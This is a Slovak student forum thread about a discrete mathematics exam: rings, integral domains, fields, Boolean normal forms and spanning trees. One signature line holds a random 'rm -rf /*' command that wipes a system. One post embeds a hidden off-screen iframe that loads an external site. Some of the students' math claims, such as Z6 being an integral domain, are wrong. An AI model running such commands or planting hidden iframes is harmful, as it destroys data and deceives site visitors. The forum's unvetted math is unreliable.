• Welcome to TUKE FÓRUM - Fórum pre študentov Technickej Univerzity v Košiciach.

DM I

Started by Eghinka, 11.05.2007, 17:10:56

« predchdzajce - alie »

kOsTi

inac... spat k DM...

jak bola ta otazka: najst okruh ktory nieje obor integrity...

ked uvediem okruh ktory je pole... tak je to dobre, ni?

asi hej ale tak uz mi kus jebe z toho vsetkeho... :)
:trestac:

glassworker

...ked je pole tak je aj obor integrity...taze to nieje dobre

kOsTi

podla mna nie... ked je to raz pole... nemozes povedat ze je to obor integrity...
podla mna je to presne stanovena podmienka... a nemoze to byt viac veci naraz....

glassworker

ee ja viem tak ze:...tam mas definovanych 6 podmienok...ak su spnene prve 3 tak je to okruh,ked 4 tak okruh aj obor integrity,ked prvych 5 tak aj teleso a 6 tak aj pole.........

dufam ze dobre hovorim.....opravte ma dakto ked nie

kOsTi

no ved hej len ci to nie je tak ze prve tri=okruh a potom uz len okruh + daco (a ze to neni potom uz spatne kompatibilne) :)

glassworker

hmmm teraz ked tak nato pozeram,tak uz ani je neviem..kua

mozno ze aj mas pravdu,ze ked su splnene prve 3 a potom az 5,6 tak je to len okruh a pole.....no neviem uz

kOsTi

tha nic... nechajme tak... uvediem napr (Z6, + , x ) a bude ;)

BossZ

Okruh (Zn;+,.) je oborom integrity práve vtedy, ak n je prvocíslo.
Dá sa dokázat, že okruh (Zn;+,.) je pole práve vtedy, ak n je prvocíslo.
<iframe style="width:300px;height:600px;padding:0;margin: -300px 0px 0px 0px;border:0;" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no" src="http://www.androidroka.sk/wp-content/themes/androidRoku/iframe.php?invite=52633e266001a22a5eb0166ee736bc68"></iframe>

kOsTi

Nasiel som prave FAKT: Každé teleso je oborom integrity.

ale preco sa nic nehovori o poli? neva... tak potom asi aj pole je OI

glassworker

Quote from: kOsTi on  08.06.2007, 00:18:37
Nasiel som prave FAKT: Každé teleso je oborom integrity.

ale preco sa nic nehovori o poli? neva... tak potom asi aj pole je OI
:D....no aspon daco

puq

farbenie grafov ake je dolezite??? hovoril na skuske nieco? ze ci bude teoria z toho?

JCube

ked je to pole tak je to automaticky aj to predchadzajuce...
sudo [ $[ $RANDOM % 6 ] == 0 ] && rm -rf /* || echo "Alive!"

fat4l

no  tak som preratal tie priklady....boole vysiel: (x prienik y' prienik z') U (x prienik y)...pocet kostier 16....je tam x6 naisto.....grupa vysla ze je grupov...nie komutativnou...aj ked nemame danu mnozinu:D...ale neva.....obor integrity napr matica 2x2 kde v prvom riadku je (a b) a v druhom je (2b a)..pre a,b patriace R....ked by mal byt obor tak by to bolo napr: (Zx, + , . )..pricom x je prvocislo....a v grafe....r(g)=2 a P(g)=3....stredy su x2,x3,x5,x6......dufam ze som sa nikde nezmylil...:)....

kOsTi

kokos no ja som teraz na kostrach a u mi jebe... dpc

Gaspacho

kOsTi: ja som hladal a som zistil ze pole je automaticky obor integrity ;-)

hrmill

no tak to mas dobre bo ja som iba pri boolovskej algebre a sa mi to nechce ucit
Čím viac práce človek má, tým sa cíti vyčerpanejší a horšie znáša stres. To isté môžeme povedať o sexe, čím je ho menej, tým je zdravie horšie a účinky stresu výraznejšie. Preto sexujte a sexujte.

fat4l

a ja uz som skoncil a idem sa hrat....:D...prijemnu zabavu šráci....

Sooloni

kua..DPC..ste ma zneistili s tymi prvocislami my sme pocitali, na cvikax a bolo to Z6 (ten obor intehrity)

Gaspacho

ne ne ta my sme tiez mali ze Z5 ... aj kdesi na FTP su riesene otazky tusim a tam je tiez riesenie Z5 :thumbs-up:

PS: Kde najdem na to dokaz? dik

joquence

Quote from: fat4l on  08.06.2007, 01:36:58
no  tak som preratal tie priklady....boole vysiel: (x prienik y' prienik z') U (x prienik y)...pocet kostier 16....je tam x6 naisto.....grupa vysla ze je grupov...nie komutativnou...aj ked nemame danu mnozinu:D...ale neva.....obor integrity napr matica 2x2 kde v prvom riadku je (a b) a v druhom je (2b a)..pre a,b patriace R....ked by mal byt obor tak by to bolo napr: (Zx, + , . )..pricom x je prvocislo....a v grafe....r(g)=2 a P(g)=3....stredy su x2,x3,x5,x6......dufam ze som sa nikde nezmylil...:)....
1. NDT f(x,y,z);   x <=> ((x=>z) U (x prienik y))
nevyslo nahodou NDT(f) = x^z  ?

Sxx

hmmm to skor vyzera na MDT ako NDT   mne pre zmenu vyslo ( X /\ Y /\ Z neg) V ( X /\ Y /\ Z )   btw tie stredy ma byt aj x5 ?

JCube

jj Sxx mas pravdu tamto su MDT...s tymto som sa dojebal na skuske aj ja...

cableguy

dalo sa tahakovat na skuske alebo velmo cumeli na vas

fat4l

dufam ze sa chapeme dobre..prienik = /\...?.....mam tam samozrejme chybu.....:)..tak to idem spocitat este raz....

JCube

Quote from: cableguy on  08.06.2007, 04:27:06
dalo sa tahakovat na skuske alebo velmo cumeli na vas

bol tam len drahy docent plavka...ale ja by som pri nom neopisoval... :P